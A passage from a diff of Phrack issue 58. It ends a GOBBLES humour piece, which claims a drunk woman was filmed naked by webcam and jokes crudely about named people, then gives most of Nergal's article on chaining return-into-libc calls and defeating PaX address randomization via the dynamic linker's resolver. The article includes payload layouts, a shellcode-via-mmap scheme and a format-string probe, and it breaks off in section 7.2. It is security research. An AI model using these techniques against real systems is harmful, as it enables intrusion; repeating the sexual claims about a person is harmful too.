+  Other very memorable experience was last week at GOBBLES Labs where
+Alicia became over intoxicated by alcohol from boxed wine (speaking of
+alcohol, Mr. Huger promise to bring GOBBLES back some good wine from he
+Canada trip, GOBBLES better get it Al!) during exploit coding session and
+then took off all her clothes.  Needless to say male GOBBLES members were
+embarassed at the mess they made.  GOBBLES swear this true story, not just
+humor, even some pictures of naked Alicia captured on webcam broadcast
+with tcpdump soon to be made into mpeg, hehe!
+
+ Write down some Quotes: 
+
+ "Opensource software has a future."
+  -Sir William Gates
+
+ "What goes around comes around."
+  -Anonymous
+
+ "That vulnerability is completly TheoRaadtical."
+  -Microsoft
+
+ "A preauthentication bug in OpenSSH?  Who hasn't found one of those?"
+  -OpenSSH Developer
+
+ "No I wasn't caught on video jerking off at defcon 9!"
+  -Peter Shipley
+ 
+ "If one XOR is good TWICE IS BETTER."
+  -Peiter Zatko
+
+
+In closing GOBBLES would like to thank Phrack and Phrack Staff for
+awarding GOBBLES this Man of the Year Award, GOBBLES very flattered to not
+only be nominated but also to be winner of award!  GOBBLES LOVE YOU!
+
+|=[ EOF ]=---------------------------------------------------------------=| 
+
diff --git a/phrack58/4.txt b/phrack58/4.txt
new file mode 100644
index 0000000..a25b4f4
--- /dev/null
+++ b/phrack58/4.txt
@@ -0,0 +1,1932 @@
+                             ==Phrack Inc.==
+
+               Volume 0x0b, Issue 0x3a, Phile #0x04 of 0x0e
+
+|=------------=[ The advanced return-into-lib(c) exploits: ]=------------=|
+|=------------------------=[ PaX case study ]=---------------------------=|
+|=-----------------------------------------------------------------------=|
+|=----------------=[ by Nergal <nergal@owl.openwall.com> ]=--------------=|
+
+
+                                               May this night carry my will
+                    And may these old mountains forever remember this night
+                                             May the forest whisper my name
+               And may the storm bring these words to the end of all worlds
+
+                                                        Ihsahn, "Alsvartr"
+
+
+--[ 1 - Intro
+
+ 1 - Intro
+
+ 2 - Classical return-into-libc
+
+ 3 - Chaining return-into-libc calls
+   3.1 - Problems with the classical approach
+   3.2 - "esp lifting" method
+   3.3 - frame faking
+   3.4 - Inserting null bytes
+   3.5 - Summary
+   3.6 - The sample code
+
+ 4 - PaX features
+   4.1 - PaX basics
+   4.2 - PaX and return-into-lib exploits
+   4.3 - PaX and mmap base randomization
+
+ 5 - The dynamic linker's dl-resolve() function
+   5.1 - A few ELF data types
+   5.2 - A few ELF data structures
+   5.3 - How dl-resolve() is called from PLT
+   5.4 - The conclusion
+
+ 6 - Defeating PaX
+   6.1 - Requirements
+   6.2 - Building the exploit
+
+ 7 - Misc
+   7.1 - Portability
+   7.2 - Other types of vulnerabilities
+   7.3 - Other non-exec solutions
+   7.4 - Improving existing non-exec schemes
+   7.5 - The versions used
+
+ 8 - Referenced publications and projects
+
+
+  This article can be roughly divided into two parts. First, the
+advanced return-into-lib(c) techniques are described. Some of the presented
+ideas, or rather similar ones, have already been published by others. 
+However, the available pieces of information are dispersed, usually
+platform-specific, somewhat limited, and the accompanying source code is not 
+instructive enough (or at all). Therefore I have decided to assemble the 
+available bits and a few of my thoughts into a single document, which should 
+be useful as a convenient reference. Judging by the contents of many posts 
+on security lists, the presented information is by no means the common 
+knowledge.
+
+  The second part is devoted to methods of bypassing PaX in case of
+stack buffer overflow (other types of vulnerabilities are discussed at the
+end). The recent PaX improvements, namely randomization of addresses the 
+stack and the libraries are mmapped at, pose an untrivial challenge for an 
+exploit coder. An original technique of calling directly the dynamic linker's 
+symbol resolution procedure is presented. This method is very generic and the
+conditions required for successful exploitation are usually satisfied.
+
+  Because PaX is Intel platform specific, the sample source code has been
+prepared for Linux i386 glibc systems. PaX is not considered sufficiently
+stable by most people; however, the presented techniques (described for
+Linux on i386 case) should be portable to other OSes/architectures and can
+be possibly used to evade other non-executability schemes, including ones
+implemented by hardware.
+
+  The reader is supposed to possess the knowledge on standard exploit
+techniques. Articles [1] and [2] should probably be assimilated before
+further reading. [12] contains a practical description of ELF internals.
+
+
+
+--[ 2 - Classical return-into-libc
+
+  The classical return-into-libc technique is well described in [2], so
+just a short summary here. This method is most commonly used to evade
+protection offered by the non-executable stack. Instead of returning into
+code located within the stack, the vulnerable function should return into a
+memory area occupied by a dynamic library. It can be achieved by
+overflowing a stack buffer with the following payload:
+
+<- stack grows this way
+   addresses grow this way ->
+------------------------------------------------------------------
+| buffer fill-up(*)| function_in_lib | dummy_int32 | arg_1 | arg_2 | ... 
+------------------------------------------------------------------
+                          ^
+                          |
+                          - this int32 should overwrite saved return address 
+                            of a vulnerable function
+
+(*) buffer fill-up should overwrite saved %ebp placeholder as well, if the
+    latter is used
+
+  When the function containing the overflown buffer returns, the 
+execution will resume at function_in_lib, which should be the address of a 
+library function. From this function's point of view, dummy_int32 will be the 
+return address, and arg_1, arg_2 and the following words - the arguments. 
+Typically, function_in_lib will be the libc system() function address, and 
+arg_1 will point to "/bin/sh".
+
+
+
+--[ 3 - Chaining return-into-libc calls 
+
+----[ 3.1 - Problems with the classical approach
+
+  The previous technique has two essential limitations. First, it is 
+impossible to call another function, which requires arguments, after 
+function_in_lib. Why ? When the function_in_lib returns, the execution will 
+resume at address dummy_int32. Well, it can be another library function,
+yet its arguments would have to occupy the same place that
+function_in_lib's argument does. Sometimes this is not a problem (see [3]
+for a generic example).
+
+  Observe that the need for more than one function call is frequent. If 
+a vulnerable application temporarily drops privileges (for example, a
+setuid application can do seteuid(getuid())), an exploit must regain
+privileges (with a call to setuid(something) usually) before calling
+system().
+
+  The second limitation is that the arguments to function_in_lib cannot
+contain null bytes (in case of a typical overflow caused by string 
+manipulation routines). There are two methods to chain multiple library
+calls.
+
+
+----[ 3.2 - "esp lifting" method        
+
+  This method is designed for attacking binaries compiled with
+-fomit-frame-pointer flag. In such case, the typical function epilogue
+looks this way:
+
+eplg:
+        addl    $LOCAL_VARS_SIZE,%esp
+        ret
+
+Suppose f1 and f2 are addresses of functions located in a library. We build 
+the following overflow string (I have skipped buffer fill-up to save space):
+
+<- stack grows this way
+   addresses grow this way ->
+
+---------------------------------------------------------------------------
+| f1 | eplg | f1_arg1 | f1_arg2 | ... | f1_argn| PAD | f2 | dmm | f2_args...
+--------------------------------------------------------------------------- 
+ ^          ^                                        ^
+ |          |                                        |
+ |          | <---------LOCAL_VARS_SIZE------------->|
+ |
+ |-- this int32 should overwrite return address
+                      of a vulnerable function
+
+  PAD is a padding (consisting of irrelevant nonzero bytes), whose 
+length, added to the amount of space occupied by f1's arguments, should equal
+LOCAL_VARS_SIZE. 
+
+  How does it work ? The vulnerable function will return into f1, which
+will see arguments f1_arg, f1_arg2 etc - OK. f1 will return into eplg. The 
+"addl $LOCAL_VARS_SIZE,%esp" instruction will move the stack pointer by 
+LOCAL_VARS_SIZE, so that it will point to the place where f2 address is 
+stored. The "ret" instruction will return into f2, which will see arguments 
+f2_args. Voila. We called two functions in a row.
+
+  The similar technique was shown in [5]. Instead of returning into a
+standard function epilogue, one has to find the following sequence of 
+instructions in a program (or library) image:
+
+pop-ret:
+        popl any_register
+        ret
+
+Such a sequence may be created as a result of a compiler optimization of a 
+standard epilogue. It is pretty common.  
+Now, we can construct the following payload:
+
+<- stack grows this way
+   addresses grow this way ->
+------------------------------------------------------------------------------
+| buffer fill-up | f1 | pop-ret | f1_arg | f2 | dmm | f2_arg1 | f2_arg2 ...  
+------------------------------------------------------------------------------
+                   ^
+                   |
+                    - this int32 should overwrite return address
+                      of a vulnerable function
+
+  It works very similarly to the previous example. Instead of moving 
+the stack pointer by LOCAL_VARS_SIZE, we move it by 4 bytes with the 
+"popl any_register" instruction. Therefore, all arguments passed to f1 can
+occupy at most 4 bytes. If we found a sequence
+
+pop-ret2:
+        popl any_register_1
+        popl any_register_2
+        ret
+
+then we could pass to f1 two arguments of 4 bytes size each. 
+
+  The problem with the latter technique is that it is usually 
+impossible to find a "pop-ret" sequence with more than three pops.
+Therefore, from now on we will use only the previous variation. 
+
+  In [6] one can find similar ideas, unfortunately with some
+errors and chaoticly explained. 
+
+  Note that we can chain an arbitrary number of functions this way. Another
+note: observe that we do not need to know the exact location of our payload
+(that is, we don't need to know the exact value of the stack pointer). Of
+course, if any of the called functions requires a pointer as an argument,
+and if this pointer should point within our payload, we will need to know
+its location.
+    
+
+----[ 3.3 - frame faking (see [4]) 
+
+    This second technique is designed to attack programs compiled 
+_without_ -fomit-frame-pointer option. An epilogue of a function in such a 
+binary looks like this:
+
+leaveret:
+        leave
+        ret
+
+Regardless of optimization level used, gcc will always prepend "ret" with
+"leave". Therefore, we will not find in such binary an useful "esp lifting" 
+sequence (but see later the end of 3.5).
+
+  In fact, sometimes the libgcc.a archive contains objects compiled with
+-fomit-frame-pointer option. During compilation, libgcc.a is linked into an
+executable by default. Therefore it is possible that a few "add $imm,
+%esp; ret" sequences can be found in an executable. However, we will not
+%rely on this gcc feature, as it depends on too many factors (gcc version,
+compiler options used and others).
+
+  Instead of returning into "esp lifting" sequence, we will return
+into "leaveret". The overflow payload will consist of logically separated 
+parts; usually, the exploit code will place them adjacently.
+
+<- stack grows this way
+   addresses grow this way ->
+                        
+                       saved FP   saved vuln. function's return address
+--------------------------------------------
+| buffer fill-up(*) | fake_ebp0 | leaveret | 
+-------------------------|------------------
+                         |
+   +---------------------+         (*) this time, buffer fill-up must not
+   |                                   overwrite the saved frame pointer !
+   v
+-----------------------------------------------
+| fake_ebp1 | f1 | leaveret | f1_arg1 | f1_arg2 ...                     
+-----|-----------------------------------------
+     |                       the first frame
+     +-+
+       |
+       v
+     ------------------------------------------------
+     | fake_ebp2 | f2 | leaveret | f2_arg1 | f2_argv2 ...
+     -----|------------------------------------------
+          |                  the second frame  
+          +-- ...
+
+  fake_ebp0 should be the address of the "first frame", fake_ebp1 - the
+address of the second frame, etc.
+
+  Now, some imagination is needed to visualize the flow of execution.
+1) The vulnerable function's epilogue (that is, leave;ret) puts fake_ebp0 
+   into %ebp and returns into leaveret. 
+2) The next 2 instructions (leave;ret) put fake_ebp1 into %ebp and 
+   return into f1. f1 sees appropriate arguments.
+3) f1 executes, then returns.
+Steps 2) and 3) repeat, substitute f1 for f2,f3,...,fn.
+
+  In [4] returning into a function epilogue is not used. Instead, the 
+author proposed the following. The stack should be prepared so that the
+code would return into the place just after F's prologue, not into the
+function F itself. This works very similarly to the presented solution.
+However, we will soon face the situation when F is reachable only via PLT.
+In such case, it is impossible to return into the address F+something; only
+the technique presented here will work. (BTW, PLT acronym means "procedure
+linkage table". This term will be referenced a few times more; if it does
+not sound familiar, have a look at the beginning of [3] for a quick
+introduction or at [12] for a more systematic description).
+
+  Note that in order to use this technique, one must know the precise
+location of fake frames, because fake_ebp fields must be set accordingly.
+If all the frames are located after the buffer fill-up, then one must know
+the value of %esp after the overflow. However, if we manage somehow to put
+fake frames into a known location in memory (in a static variable
+preferably), there is no need to guess the stack pointer value. 
+
+  There is a possibility to use this technique against programs 
+compiled with -fomit-frame-pointer. In such case, we won't find leave&ret
+code sequence in the program code, but usually it can be found in the
+startup routines (from crtbegin.o) linked with the program. Also, we must
+change the "zeroth" chunk to
+
+-------------------------------------------------------
+| buffer fill-up(*) | leaveret | fake_ebp0 | leaveret |
+-------------------------------------------------------
+                          ^
+                          |
+                          |-- this int32 should overwrite return address
+                                   of a vulnerable function
+
+  Two leaverets are required, because the vulnerable function will not 
+set up %ebp for us on return. As the "fake frames" method has some advantages 
+over "esp lifting", sometimes it is necessary to use this trick even when 
+attacking a binary compiled with -fomit-frame-pointer.
+
+
+----[ 3.4 - Inserting null bytes
+
+  One problem remains: passing to a function an argument which
+contains 0. But when multiple function calls are available, there is a
+simple solution. The first few called functions should insert 0s into the
+place occupied by the parameters to the next functions.
+
+  Strcpy is the most generic function which can be used. Its second
+argument should point to the null byte (located at some fixed place,
+probably in the program image), and the first argument should point to the
+byte which is to be nullified. So, thus we can nullify a single byte per a
+function call. If there is need to zero a few int32 location, perhaps other
+solutions will be more space-effective. For example,
+sprintf(some_writable_addr,"%n%n%n%n",ptr1, ptr2, ptr3, ptr4); will nullify
+a byte at some_writable_addr and nullify int32 locations at ptr1, ptr2,
+ptr3, ptr4. Many other functions can be used for this purpose, scanf being
+one of them (see [5]).
+
+  Note that this trick solves one potential problem. If all libraries
+are mmapped at addresses which contain 0 (as in the case of Solar
+Designer non-exec stack patch), we can't return into a library directly,
+because we can't pass null bytes in the overflow payload. But if strcpy (or 
+sprintf, see [3]) is used by the attacked program, there will be the 
+appropriate PLT entry, which we can use. The first few calls should be the
+calls to strcpy (precisely, to its PLT entry), which will nullify not the 
+bytes in the function's parameters, but the bytes in the function address 
+itself. After this preparation, we can call arbitrary functions from 
+libraries again.
+
+
+----[ 3.5 - Summary
+
+  Both presented methods are similar. The idea is to return from a 
+called function not directly into the next one, but into some function
+epilogue, which will adjust the stack pointer accordingly (possibly with
+the help of the frame pointer), and transfer the control to the next
+function in the chain.
+
+  In both cases we looked for an appropriate epilogue in the
+executable body. Usually, we may use epilogues of library functions as
+well.  However, sometimes the library image is not directly reachable. One
+such case has already been mentioned (libraries can be mmapped at addresses
+which contain a null byte), we will face another case soon. Executable's
+image is not position independent, it must be mmapped at a fixed location
+(in case of Linux, at 0x08048000), so we may safely return into it. 
+
+
+----[ 3.6 - The sample code
+
+  The attached files, ex-move.c and ex-frames.c, are the exploits for
+vuln.c program. The exploits chain a few strcpy calls and a mmap call. The
+additional explanations are given in the following chapter (see 4.2);
+anyway, one can use these files as templates for creating return-into-lib
+exploits.
+
+
+
+--[ 4 - PaX features 
+
+----[ 4.1 - PaX basics
+
+  If you have never heard of PaX Linux kernel patch, you are advised to 
+visit the project homepage [7]. Below there are a few quotations from the
+PaX documentation.
+
+   "this document discusses the possibility of implementing non-executable
+   pages for IA-32 processors (i.e. pages which user mode code can read or
+   write, but cannot execute code in). since the processor's native page
+   table/directory entry format has no provision for such a feature, it is
+   a non-trivial task."
+
+   "[...] there is a desire to provide some sort of programmatic way for 
+   protecting against buffer overflow based attacks. one such idea is the 
+   implementation of non-executable pages which eliminates the possibility
+   of executing code in pages which are supposed to hold data only[...]" 
+
+   "[...] possible to write [kernel mode] code which will cause an 
+   inconsistent state in the DTLB and ITLB entries.[...] this very same 
+   mechanism would allow for creating another kind of inconsistent state 
+   where only data read/write accesses would be allowed and code execution 
+   prohibited. and this is what is needed for protecting against (many) 
+   buffer overflow based attacks."
+
+  To sum up, a buffer overflow exploit usually tries to run code smuggled
+within some data passed to the attacked process. The main PaX functionality
+is to disallow execution of all data areas - thus PaX renders typical
+exploit techniques useless.
+
+
+--[ 4.2 - PaX and return-into-lib exploits
+
+  Initially, non-executable data areas was the only feature of PaX. As
+you may have already guessed, it is not enough to stop return-into-lib
+exploits. Such exploits run code located within libraries or binary itself -
+the perfectly "legitimate" code. Using techniques described in chapter 3,
+one is able to run multiple library functions, which is usually more than
+enough to take advantage of the exploited program's privileges. 
+
+Even worse, the following code will run successfully on a PaX protected
+system:
+
+    char shellcode[] = "arbitrary code here";
+    mmap(0xaa011000, some_length, PROT_EXEC|PROT_READ|PROT_WRITE,  
+                           MAP_FIXED|MAP_PRIVATE|MAP_ANON, -1, some_offset);
+    strcpy(0xaa011000+1, shellcode);
+    return into 0xaa011000+1;
+
+  A quick explanation: mmap call will allocate a memory region at
+0xaa011000. It is not related to any file object, thanks to the MAP_ANON
+flag, combined with the file descriptor equal to -1. The code located at
+0xaa011000 can be executed even on PaX (because PROT_EXEC was set in mmap
+arguments). As we see, the arbitrary code placed in "shellcode" will be
+executed.
+
+  Time for code examples. The attached file vuln.c is a simple program 
+with an obvious stack overflow. Compile it with:
+
+$ gcc -o vuln-omit -fomit-frame-pointer vuln.c 
+$ gcc -o vuln vuln.c
+
+  The attached files, ex-move.c and ex-frames.c, are the exploits for
+vuln-omit and vuln binaries, respectively. Exploits attempt to run a
+sequence of strcpy() and mmap() calls. Consult the comments in the
+README.code for further instructions. 
+
+  If you plan to test these exploits on a system protected with recent
+version of PaX, you have to disable randomizing of mmap base with
+
+$ chpax -r vuln; chpax -r vuln-omit
+
+
+----[ 4.3 - PaX and mmap base randomization
+
+  In order to combat return-into-lib(c) exploits, a cute feature was
+added to PaX. If the appropriate option (CONFIG_PAX_RANDMMAP) is set during
+kernel configuration, the first loaded library will be mmapped at random
+location (next libraries will be mmapped after the first one). The same
+applies to the stack. The first library will be mmapped at
+0x40000000+random*4k, the stack top will be equal to 0xc0000000-random*16;
+in both cases, "random" is a pseudo random unsigned 16-bit integer,
+obtained with a call to get_random_bytes(), which yields cryptographically
+strong data.
+
+  One can test this behavior by running twice "ldd some_binary"
+command or executing "cat /proc/$$/maps" from within two invocations of a
+shell. Under PaX, the two calls yield different results:
+
+nergal@behemoth 8 > ash 
+$ cat /proc/$$/maps
+08048000-08058000 r-xp 00000000 03:45 77590      /bin/ash
+08058000-08059000 rw-p 0000f000 03:45 77590      /bin/ash
+08059000-0805c000 rw-p 00000000 00:00 0
+4b150000-4b166000 r-xp 00000000 03:45 107760     /lib/ld-2.1.92.so
+4b166000-4b167000 rw-p 00015000 03:45 107760     /lib/ld-2.1.92.so
+4b167000-4b168000 rw-p 00000000 00:00 0
+4b16e000-4b289000 r-xp 00000000 03:45 107767     /lib/libc-2.1.92.so
+4b289000-4b28f000 rw-p 0011a000 03:45 107767     /lib/libc-2.1.92.so
+4b28f000-4b293000 rw-p 00000000 00:00 0
+bff78000-bff7b000 rw-p ffffe000 00:00 0
+$ exit
+nergal@behemoth 9 > ash 
+$ cat /proc/$$/maps
+08048000-08058000 r-xp 00000000 03:45 77590      /bin/ash
+08058000-08059000 rw-p 0000f000 03:45 77590      /bin/ash
+08059000-0805c000 rw-p 00000000 00:00 0
+48b07000-48b1d000 r-xp 00000000 03:45 107760     /lib/ld-2.1.92.so
+48b1d000-48b1e000 rw-p 00015000 03:45 107760     /lib/ld-2.1.92.so
+48b1e000-48b1f000 rw-p 00000000 00:00 0
+48b25000-48c40000 r-xp 00000000 03:45 107767     /lib/libc-2.1.92.so
+48c40000-48c46000 rw-p 0011a000 03:45 107767     /lib/libc-2.1.92.so
+48c46000-48c4a000 rw-p 00000000 00:00 0
+bff76000-bff79000 rw-p ffffe000 00:00 0
+
+  CONFIG_PAX_RANDMMAP feature makes it impossible to simply return
+into a library. The address of a particular function will be different each
+time a binary is run.
+
+  This feature has some obvious weaknesses; some of them can (and should
+be) fixed:
+
+  1) In case of a local exploit the addresses the libraries and the 
+stack are mmapped at can be obtained from the world-readable
+/proc/pid_of_attacked_process/maps pseudofile. If the data overflowing the
+buffer can be prepared and passed to the victim after the victim process
+has started, an attacker has all information required to construct the
+overflow data. For example, if the overflowing data comes from program
+arguments or environment, a local attacker loses; if the data comes from
+some I/O operation (socket, file read usually), the local attacker wins.
+Solution: restrict access to /proc files, just like it is done in many
+other security patches.  
+
+  2) One can bruteforce the mmap base. Usually (see the end of 6.1) it 
+is enough to guess the libc base. After a few tens of thousands tries, an
+attacker has a fair chance of guessing right. Sure, each failed attempt is
+logged, but even large amount of logs at 2 am prevent nothing :) Solution:
+deploy segvguard [8]. It is a daemon which is notified by the kernel each
+time a process crashes with SIGSEGV or similar. Segvguard is able to
+temporarily disable execution of programs (which prevents bruteforcing),
+and has a few interesting features more. It is worth to use it even without
+PaX. 
+
+  3) The information on the library and stack addresses can leak due to 
+format bugs. For example, in case of wuftpd vulnerability, one could explore 
+the stack with the command
+site exec [eat stack]%x.%x.%x...
+The automatic variables' pointers buried in the stack will reveal the stack 
+base. The dynamic linker and libc startup routines leave on the stack some 
+pointers (and return addresses) to the library objects, so it is possible
+to deduce the libraries base as well.  
+
+  4) Sometimes, one can find a suitable function in an attacked binary 
+(which is not position-independent and can't be mmapped randomly). For
+example, "su" has a function (called after successful authentication) which
+acquires root privileges and executes a shell - nothing more is needed.
+
+  5) All library functions used by a vulnerable program can be called 
+via their PLT entry. Just like the binary, PLT must be present at a fixed
+address. Vulnerable programs are usually large and call many functions, so
+there is some probability of finding interesting stuff in PLT.
+  
+  In fact only the last three problems cannot be fixed, and none of 
+them is guaranteed to manifest in a manner allowing successful exploitation 
+(the fourth is very rare). We certainly need more generic methods. 
+
+  In the following chapter I will describe the interface to the dynamic 
+linker's dl-resolve() function. If it is passed appropriate arguments, one
+of them being an asciiz string holding a function name, it will determine
+the actual function address. This functionality is similar to dlsym()
+function.  Using the dl-resolve() function, we are able to build a
+return-into-lib exploit, which will return into a function, whose address
+is not known at exploit's build time. [12] also describes a method of
+acquiring a function address by its name, but the presented technique is
+useless for our purposes.
+
+
+
+--[ 5 - The dynamic linker's dl-resolve() function
+
+  This chapter is simplified as much as possible. For the
+detailed description, see [9] and glibc sources, especially the file
+dl-runtime.c. See also [12]. 
+
+
+----[ 5.1 - A few ELF data types
+
+The following definitions are taken from the include file elf.h:
+
+typedef uint32_t Elf32_Addr;
+typedef uint32_t Elf32_Word;
+typedef struct
+{
+  Elf32_Addr    r_offset;               /* Address */
+  Elf32_Word    r_info;                 /* Relocation type and symbol index */
+} Elf32_Rel;
+/* How to extract and insert information held in the r_info field.  */
+#define ELF32_R_SYM(val)                ((val) >> 8)
+#define ELF32_R_TYPE(val)               ((val) & 0xff)
+
+
+typedef struct
+{
+  Elf32_Word    st_name;   /* Symbol name (string tbl index) */
+  Elf32_Addr    st_value;  /* Symbol value */
+  Elf32_Word    st_size;   /* Symbol size */
+  unsigned char st_info;   /* Symbol type and binding */
+  unsigned char st_other;  /* Symbol visibility under glibc>=2.2 */
+  Elf32_Section st_shndx;  /* Section index */
+} Elf32_Sym;
+The fields st_size, st_info and st_shndx are not used during symbol
+resolution.
+
+
+----[ 5.2 - A few ELF data structures
+
+  The ELF executable file contains a few data structures (arrays
+mainly) which are of some interest for us. The location of these structures
+can be retrieved from the executable's dynamic section. "objdump -x file"
+will display the contents of the dynamic section:
+
+$ objdump -x some_executable       
+... some other interesting stuff...
+Dynamic Section:
+...
+  STRTAB      0x80484f8 the location of string table (type char *)
+  SYMTAB      0x8048268 the location of symbol table (type Elf32_Sym*)
+....
+  JMPREL      0x8048750 the location of table of relocation entries 
+                        related to PLT (type Elf32_Rel*)
+...
+  VERSYM      0x80486a4 the location of array of version table indices 
+                        (type uint16_t*)
+"objdump -x" will also reveal the location of .plt section, 0x08048894 in
+the example below:
+ 11 .plt          00000230  08048894  08048894  00000894  2**2
+                  CONTENTS, ALLOC, LOAD, READONLY, CODE
+
+
+----[ 5.3 - How dl-resolve() is called from PLT
+
+  A typical PLT entry (when elf format is elf32-i386) looks this way:
+
+(gdb) disas some_func
+Dump of assembler code for function some_func:
+0x804xxx4 <some_func>:     jmp    *some_func_dyn_reloc_entry
+0x804xxxa <some_func+6>:   push   $reloc_offset
+0x804xxxf <some_func+11>:  jmp    beginning_of_.plt_section
+
+  PLT entries differ only by $reloc_offset value (and the value of
+some_func_dyn_reloc_entry, but the latter is not used for the symbol
+resolution algorithm).
+
+  As we see, this piece of code pushes $reloc_offset onto the stack
+and jumps at the beginning of .plt section. After a few instructions, the
+control is passed to dl-resolve() function, reloc_offset being one of its
+arguments (the second one, of type struct link_map *, is irrelevant for us).
+The following is the simplified dl-resolve() algorithm:
+
+1) calculate some_func's relocation entry
+        Elf32_Rel * reloc = JMPREL + reloc_offset;
+
+2) calculate some_func's symtab entry
+        Elf32_Sym * sym = &SYMTAB[ ELF32_R_SYM (reloc->r_info) ];
+
+3) sanity check 
+          assert (ELF32_R_TYPE(reloc->r_info) == R_386_JMP_SLOT);
+
+4) late glibc 2.1.x (2.1.92 for sure) or newer, including 2.2.x, performs
+   another check. if sym->st_other & 3 != 0, the symbol is presumed to have
+   been resolved before, and the algorithm goes another way (and probably
+   ends with SIGSEGV in our case). We must ensure that sym->st_other & 
+   3 == 0. 
+
+5) if symbol versioning is enabled (usually is), determine the version table
+   index
+        uint16_t ndx = VERSYM[ ELF32_R_SYM (reloc->r_info) ]; 
+
+and find version information
+        const struct r_found_version *version =&l->l_versions[ndx];
+
+  where l is the link_map parameter. The important part here is that ndx must
+  be a legal value, preferably 0, which means "local symbol".
+
+6) the function name (an asciiz string) is determined:
+        name = STRTAB + sym->st_name;
+
+7) The gathered information is sufficient to determine some_func's address.
+   The results are cached in two variables of type Elf32_Addr, located at
+   reloc->r_offset and sym->st_value.
+
+8) The stack pointer is adjusted, some_func is called.
+
+Note: in case of glibc, this algorithm is performed by the fixup() function,
+called by dl-runtime-resolve().
+
+
+----[ 5.4 - The conclusion
+
+        Suppose we overflow a stack buffer with the following payload
+
+--------------------------------------------------------------------------
+| buffer fill-up | .plt start | reloc_offset | ret_addr | arg1 | arg2 ...         
+--------------------------------------------------------------------------
+                         ^
+                         |
+                         - this int32 should overwrite saved return address 
+                           of a vulnerable function
+
+  If we prepare appropriate sym and reloc variables (of type Elf32_Sym 
+and Elf32_Rel, respectively), and calculate appropriate reloc_offset, the 
+control will be passed to the function, whose name is found at 
+STRTAB + sym->st_name (we control it of course). Arguments arg1, arg2 will
+be placed appropriately, and still we have opportunity to return into
+another function (ret_addr).
+
+  The attached dl-resolve.c is a sample code which implements the 
+described technique. Beware, you have to compile it twice (see the comments 
+in the README.code).
+
+
+
+--[ 6 - Defeating PaX
+
+----[ 6.1 - Requirements
+
+  In order to use the "ret-into-dl" technique described in chapter 5, 
+we need to position a few structures at appropriate locations. We will need
+a function, which is capable of moving bytes to a selected place. The
+obvious choice is strcpy; strncpy, sprintf or similar would do as well. So,
+just like in [3], we will require that there is a PLT entry for strcpy in
+an attacked program's image. 
+
+  "Ret-into-dl" solves a problem with randomly mmapped libraries;
+however, the problem of the stack remains. If the overflow payload resides
+on the stack, its address will be unknown, and we will be unable to insert
+0s into it with strcpy (see 3.3). Unfortunately, I haven't come up with a
+generic solution (anyone?). Two methods are possible:
+
+1) if scanf() function is available in PLT, we may try to execute something
+   like
+
+        scanf("%s\n",fixed_location)
+
+   which will copy from stdin appropriate payload into fixed_location. When
+   using "fake frames" technique, the stack frames can be disjoint, so we
+   will be able to use fixed_location as frames.
+
+2) if the attacked binary is compiled with -fomit-frame-pointer, we can
+   chain multiple strcpy calls with the "esp lifting" method even if %esp
+   is unknown  (see the note at the end of 3.2). The nth strcpy would have
+   the following arguments:
+
+        strcpy(fixed_location+n, a_pointer_within_program_image)
+
+   This way we can construct, byte by byte, appropriate frames at
+   fixed_location. When it is done, we switch from "esp lifting" to "fake
+   frames" with the trick described at the end of 3.3.
+
+  More similar workarounds can be devised, but in fact they usually 
+will not be needed. It is very likely that even a small program will copy
+some user-controlled data into a static or malloced variable, thus saving
+us the work described above. 
+
+  To sum up, we will require two (fairly probable) conditions to be met:
+
+6.1.1) strcpy (or strncpy, sprintf or similar) is available via PLT
+6.1.2) during normal course of execution, the attacked binary copies
+       user-provided data into a static (preferably) or malloced variable.
+
+
+----[ 6.2 - Building the exploit
+
+  We will try to emulate the code in dl-resolve.c sample exploit. When 
+a rwx memory area is prepared with mmap (we will call mmap with the help of
+ret-into-dl), we will strcpy the shellcode there and return into the copied
+shellcode. We discuss the case of the attacked binary having been compiled
+without -fomit-frame-pointer and the "frame faking" method.
+
+  We need to make sure that three related structures are placed properly:
+
+1) Elf32_Rel reloc
+2) Elf32_Sym sym
+3) unsigned short verind (which should be 0)
+   How the addresses of verind and sym are related ? Let's assign to
+   "real_index" the value of ELF32_R_SYM (reloc->r_info); then
+
+        sym         is at SYMTAB+real_index*sizeof(Elf32_Sym)
+        verind      is at VERSYM+real_index*sizeof(short)
+
+  It looks natural to place verind at some place in .data or .bss section
+and nullify it with two strcpy calls. Unfortunately, in such case
+real_index tends to be rather large. As sizeof(Elf32_Sym)=16, which is
+larger than sizeof(short), sym would likely be assigned the address beyond
+a process' data space. That is why in dl-resolve.c sample program (though
+it is very small) we have to allocate a few tens of thousands (RQSIZE) of
+bytes.
+
+  Well, we can arbitrarily enlarge a process' data space with setting
+MALLOC_TOP_PAD_ environ variable (remember traceroute exploit ?), but this
+would work only in case of a local exploit. Instead, we will choose more
+generic (and cheaper) method. We will place verind lower, usually within
+read-only mmapped region, so we need to find a null short there. The
+exploit will relocate "sym" structure into an address determined by verind
+location.
+
+  Where to look for this null short ? First, we should determine (by 
+consulting /proc/pid/maps just before the attacked program crashes) the
+bounds of the memory region  which is mmapped writable (the executable's
+data area) when the overflow occurs. Say, these are the addresses within
+[low_addr,hi_addr]. We will copy "sym" structure there. A simple
+calculation tells us that real_index must be within
+[(low_addr-SYMTAB)/16,(hi_addr-SYMTAB)/16], so we have to look for null
+short within [VERSYM+(low_addr-SYMTAB)/8, VERSYM+(hi_addr-SYMTAB)/8].
+Having found a suitable verind, we have to check additionally that 
+
+1) sym's address won't intersect our fake frames 
+2) sym's address won't overwrite any internal linker data (like strcpy's 
+   GOT entry)
+
+3) remember that the stack pointer will be moved to the static data area. 
+   There must be enough room for stack frames allocated by the dynamic
+   linker procedures. So, its best (though not necessary) to place "sym"
+   after our fake frames.
+
+  An advice: it's better to look for a suitable null short with gdb,
+than analyzing "objdump -s" output. The latter does not display memory
+placed after .rodata section.
+
+  The attached ex-pax.c file is a sample exploit against pax.c. The
+only difference between vuln.c and pax.c is that the latter copies another
+environment variable into a static buffer (so 6.1.2 is satisfied).
+
+
+
+--[ 7 - Misc
+
+
+----[ 7.1 - Portability
+
+  Because PaX is designed for Linux, throughout this document we
+focused on this OS. However, presented techniques are OS independent. Stack
+and frame pointers, C calling conventions, ELF specification - all these
+definitions are widely used. In particular, I have successfully run
+dl-resolve.c on Solaris i386 and FreeBSD. To be exact, mmap's fourth
+argument had to be adjusted (looks like MAP_ANON has different value on BSD
+systems).  In case of these two OS, the dynamic linker do not feature
+symbol versions, so ret-into-dl is even easier to accomplish.   
+
+
+----[ 7.2 - Other types of vulnerabilities
+
+  All presented techniques are based on stack buffer overflow. All
+return-into-something exploits rely on the fact that with a single overflow
